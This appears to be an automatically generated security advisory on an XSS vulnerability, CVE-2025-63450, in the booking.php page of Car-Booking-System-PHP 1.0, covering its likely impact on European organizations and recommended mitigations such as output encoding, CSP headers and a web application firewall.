CVE-2025-63450 identifies a Cross Site Scripting (XSS) vulnerability in the Car-Booking-System-PHP version 1.0, specifically within the /carlux/booking.php script. XSS vulnerabilities occur when an application does not properly sanitize user-supplied input, allowing attackers to inject malicious client-side scripts that execute in other users' browsers. In this case, the booking.php page likely processes user input without adequate validation or output encoding, enabling attackers to craft URLs or form submissions that embed malicious JavaScript. When unsuspecting users access these crafted inputs, the malicious scripts can run, potentially stealing session cookies, redirecting users to phishing sites, or performing unauthorized actions on behalf of the user. Although no CVSS score has been assigned and no public exploits are known, the vulnerability is published and should be treated seriously. The lack of patch links suggests that no official fix has been released yet, increasing the urgency for organizations to implement interim mitigations. The vulnerability affects web applications built on PHP, a widely used server-side language, which means many small to medium-sized enterprises in the car rental and booking sector could be exposed if they use this software. The attack does not require authentication or user interaction beyond visiting a malicious link, making it relatively easy to exploit. However, the impact is limited to the web application context and user sessions, without direct system compromise. The vulnerability primarily threatens confidentiality and integrity of user data and sessions, with availability impact being minimal. Given these factors, the threat is moderate but should not be ignored.

For European organizations, exploitation of this XSS vulnerability could lead to unauthorized access to user sessions, theft of sensitive personal or payment information, and manipulation of booking data. This could result in financial losses, regulatory penalties under GDPR due to data breaches, and reputational damage. Car rental and booking services are customer-facing and handle personal identifiable information (PII), making them attractive targets. Attackers could leverage this vulnerability to conduct phishing campaigns or spread malware via injected scripts. The impact on availability is low, but the compromise of confidentiality and integrity could disrupt business operations and customer trust. Organizations may also face legal consequences if user data is exposed. The lack of a patch increases risk exposure, especially for smaller companies that may lack robust security controls. European entities with significant online booking operations are at higher risk, and the threat could be amplified during peak travel seasons when booking volumes increase.

Immediate mitigation should focus on implementing strict input validation and output encoding on the /carlux/booking.php page to neutralize malicious scripts. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Use security libraries or frameworks that automatically handle XSS protections. Conduct a thorough code review of the booking system to identify and remediate other potential injection points. Monitor web server logs and application behavior for unusual requests or error patterns indicative of exploitation attempts. If possible, isolate the vulnerable application behind a web application firewall (WAF) configured to detect and block XSS payloads. Educate users and staff about phishing risks related to XSS attacks. Plan for an official patch deployment once available from the vendor, and consider replacing or upgrading the booking system if it is no longer maintained. Regularly update PHP and related dependencies to minimize other vulnerabilities. Finally, ensure compliance with GDPR by having incident response plans ready in case of data compromise.